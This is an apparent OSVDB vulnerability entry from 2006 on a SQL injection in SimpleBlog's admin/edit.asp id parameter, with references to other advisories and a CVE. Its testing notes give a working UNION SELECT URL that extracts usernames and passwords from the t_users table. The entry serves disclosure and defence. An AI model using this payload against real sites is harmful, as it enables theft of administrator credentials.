SimpleBlog edit.asp id Variable SQL Injection

2006-11-26T07:03:51
ID OSVDB:30757
Type osvdb
Reporter OSVDB
Modified 2006-11-26T07:03:51

Description

Manual Testing Notes

http://[target]/[path]/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users

References:

Secunia Advisory ID:23098 ISS X-Force ID: 30483 Generic Exploit URL: http://milw0rm.com/exploits/2853 FrSIRT Advisory: ADV-2006-4742 CVE-2006-6191